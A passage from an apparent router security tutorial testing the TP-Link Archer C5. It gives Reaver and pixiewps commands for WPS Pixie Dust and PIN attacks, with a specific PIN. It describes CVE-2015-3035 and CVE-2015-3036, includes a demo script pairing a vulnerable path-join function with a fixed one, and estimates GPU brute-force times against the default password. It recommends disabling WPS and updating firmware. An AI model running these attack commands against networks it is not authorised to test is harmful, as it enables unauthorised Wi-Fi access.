Another WPS vulnerability is known as the Pixie Dust attack. The Pixie Dust attack is performed with a modified version of Reaver together with a secondary tool called pixiewps. Pixie Dust is an offline WPS attack, which means that the attacker retrieves the needed data from the access point in seconds, and that data can then be used offline to retrieve the wireless password. This only applies to routers that are vulnerable to this attack. Let's see if the TP Link Archer C5 is vulnerable to this offline Pixie Dust attack.
To start the pixie dust attack using Reaver use the following command:
reaver -i wlan0mon -b [Router MAC address] -c [channel] -vvv -K 1 -f
[Image: TP Link Archer C5 - Reaver Pixie Dust attack]
Or use the following command to start pixiewps manually and supply the needed data yourself:
pixiewps -e [PKE] -s [EHASH1] -z [EHASH2] -a [AUTHKEY] -S
[Image: TP Link Archer C5 - pixiewps]
The TP Link Archer C5 router seems to be invulnerable to the Pixie Dust WPS attack. If a router is vulnerable, pixiewps returns the WPS PIN, which can be used in Reaver to retrieve the WPA key using the following command:
reaver -i mon0 -c 1 -b [Router MAC] -vv -S --pin=[WPS PIN]
Let's see what happens if we run this command on the Archer C5 with the valid WPS PIN:
reaver -i mon0 -c 1 -b [Router MAC] -vv -d 0 -w -n -S --pin=98159338
[Image: TP Link Archer C5 - Reaver with correct PIN]
With the correct PIN Reaver will return the WPA PSK.
Although the access point locks itself up after a few attempts it is possible to retrieve the WPA PSK with the correct WPS PIN and Reaver.

Reversing the default WPS PIN

The remaining question now is how the TP Link Archer C5 generates the default WPS PIN, because every time we restore the WPS PIN it resets back to the same default PIN. Some router manufacturers, like Belkin (Belkin N900) and D-Link (D-Link DIR-810L), used to calculate the default PIN from the MAC address, which was discovered by reverse engineering the algorithm. Other routers have the default PIN programmed into NVRAM at the factory. NVRAM stands for non-volatile random-access memory, which is memory that retains its content after the power is turned off. Of course router manufacturers do not want to lose the default WPS PIN after the device is powered off.
At this moment we do not know which method TP-Link uses to restore the default PIN of the Archer C5 router. If somebody succeeds in finding a method to derive the default WPS PIN from static figures like the MAC address or serial number, it would leave a lot of routers with WPS turned on vulnerable. Retrieving the wireless password would then be as simple as feeding the PIN, BSSID and channel to Reaver, as we've demonstrated earlier in this tutorial.

Defending against attackers exploiting WPS vulnerabilities

We always recommend turning off WPS in the router settings to prevent attackers from exploiting WPS vulnerabilities. Even though this router is not vulnerable to any of the tested WPS attacks, new WPS vulnerabilities can arise without you knowing it. Since routers used in homes and small offices typically have a long lifecycle (often without updates), it is all the more advisable to turn this useless feature off. For the Archer C5 router you can simply open the wireless menu and turn WPS off using the 'Disable WPS' button as pictured below.
[Image: TP Link Archer C5 - WPS enabled by default. Disable WPS in this menu]
Let’s continue to see if the router has any known backdoors or vulnerabilities in the next chapter.

TP Link Archer C5 Backdoors and Vulnerabilities

A good place to start searching for known backdoors and vulnerabilities in our TP Link Archer C5 router is the National Vulnerability Database and the exploit database websites. On these websites we came across two vulnerabilities for the Archer C5 router with a high severity rating: CVE-2015-3035 and CVE-2015-3036. Both vulnerabilities have already been fixed by the vendor through a firmware update in 2015.

CVE-2015-3035: Directory traversal vulnerability

This directory traversal vulnerability allows a remote attacker to read arbitrary files via a .. (dot dot) in the PATH_INFO to login/. This vulnerability affects the following TP Link router products, including the Archer C5 router (hardware version 1.2) with firmware before 150317:
  • TP-LINK Archer C5 (1.2) with firmware before 150317
  • C7 (2.0) with firmware before 150304
  • C8 (1.0) with firmware before 150316
  • Archer C9 (1.0)
  • TL-WDR3500 (1.0)
  • TL-WDR3600 (1.0)
  • TL-WDR4300 (1.0) with firmware before 150302
  • TL-WR740N (5.0)
  • TL-WR741ND (5.0) with firmware before 150312
  • TL-WR841N (9.0)
  • TL-WR841N (10.0)
  • TL-WR841ND (9.0)
  • TL-WR841ND (10.0) with firmware before 150310.
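The CVE description above only says that a .. in PATH_INFO under login/ lets a remote client read arbitrary files, so the pattern behind it is worth spelling out. The script below is an added example and is not the Archer C5 firmware's code: it shows the vulnerable pattern (joining a request path onto the document root without checking it) next to a check that decodes the path once, normalises it and refuses anything that resolves outside the web root. The web root and the sample requests are constructed for the example; the filesystem is never touched, so it runs anywhere.

```python
"""Rejecting directory traversal in a path taken from the request.

Added example, not the Archer C5 firmware's code: the page gives only the
CVE description (".." in PATH_INFO under login/), so this shows the general
class of bug and a check that closes it. WEB_ROOT and the sample requests
are constructed for the example.
"""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/www"  # assumed document root, not a path taken from the router


def unsafe_resolve(web_root: str, path_info: str) -> str:
    """The vulnerable pattern: the request path is glued onto the web root
    without normalising or checking it, so ../ segments walk out of it."""
    return web_root + "/" + unquote(path_info).lstrip("/")


def safe_resolve(web_root: str, path_info: str):
    """Return the on-disk path for PATH_INFO, or None if it escapes web_root.

    Decodes percent-encoding once, normalises ".", ".." and repeated
    slashes, then requires the result to stay inside web_root.
    """
    decoded = unquote(path_info)
    if "\x00" in decoded:
        return None  # a NUL byte can truncate the path in C-level file APIs
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Prefix test with a trailing slash so "/www-old" does not pass for "/www".
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    samples = (
        "/login/index.htm",
        "/login/../../etc/passwd",
        "/%2e%2e/%2e%2e/etc/passwd",
    )
    for request in samples:
        print(f"{request!r:32} unsafe -> {unsafe_resolve(WEB_ROOT, request)}")
        print(f"{'':32} safe   -> {safe_resolve(WEB_ROOT, request)}")
```

The comparison is the point: `unsafe_resolve` happily returns a path that the operating system will resolve to /etc/passwd, while `safe_resolve` rejects the same request whether the dots are literal or percent-encoded. On a device you cannot patch, the equivalent mitigation is to keep the management interface off the WAN side entirely, which is also what the firmware notes later in this post address.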

CVE-2015-3036: Stack-based buffer overflow in the KCodes NetUSB module

Stack-based buffer overflow in the run_init_sbus function in the KCodes NetUSB module for the Linux kernel. KCodes NetUSB is used in certain Netgear, TP-LINK, and other products and allows remote attackers to execute arbitrary code by providing a long computer name in a session on TCP port 20005. You can find more information about this vulnerability here:
And a full disclosure here:

How to avoid vulnerability exploits on your router

Both of these high-severity vulnerabilities show the importance of keeping the firmware of your router up to date. CVE-2015-3035 and CVE-2015-3036 were fixed in 2015 for the Archer C5 with the following update: Archer C5(UN)_V2_150515. TP Link mentions the following about the update on its website:
  1. Fixed the security bug caused by overflowing of Kcodes buffer.
  2. Fixed the bug that you can access FTP Server from WAN port without password.
May 2015 may seem like a long time ago, but in terms of security patches for consumer products it is like yesterday. I'm sure there are a lot of routers out there which haven't been patched yet, because many home and small office users do not check for firmware updates on a regular basis. New vulnerabilities are discovered all the time and often affect a lot of models, as you can see in the list of models affected by the directory traversal vulnerability CVE-2015-3035. This is especially true when drivers are affected which are used by a lot of vendors, as was the case with KCodes NetUSB in CVE-2015-3036. We advise you to check for firmware updates for any router on a regular basis and to update as soon as possible when a new version is available. You can find the firmware version of your router in the router settings under the System tools > Firmware update menu. Our Archer C5 was shipped with the 150515 firmware, in which both vulnerabilities have been patched.

Brute forcing the TP Link Archer C5 default password

The default wireless password for the Archer C5 router is the default WPS PIN. The WPS PIN is an eight-digit number, which leaves us with 10^8 = 100.000.000 different possibilities if we were to brute force the password. In the Cracking WPA with oclHashcat GPU on Windows tutorial from last year we learned that an old video card like an AMD Radeon 7670M can do 20.000 attempts per second. A newer and more powerful video card like the AMD HD7970 can easily do 142.000 attempts per second. When we divide the 100 million possibilities by 142.000 it takes 705 seconds, which is less than 12 minutes, to brute force the password. Keep in mind that a newer and better performing video card could probably do it in less than 10 minutes. With these figures coming from consumer grade hardware with really average processing power, we're still surprised that TP Link uses the default WPS PIN as the default wireless password. If there was any good reason to do that, they could at least inform or warn the end user about changing the default wireless password to a more secure one. Last year we already did a tutorial on how to brute force WPA passwords with the power of GPUs. You can watch it here:
Let's see if we can capture a WPA handshake and convert the captured .cap file to .hccap so we can use oclHashcat with a GPU to crack the password. Theoretically it should take about 1.5 hours at 20k attempts per second.

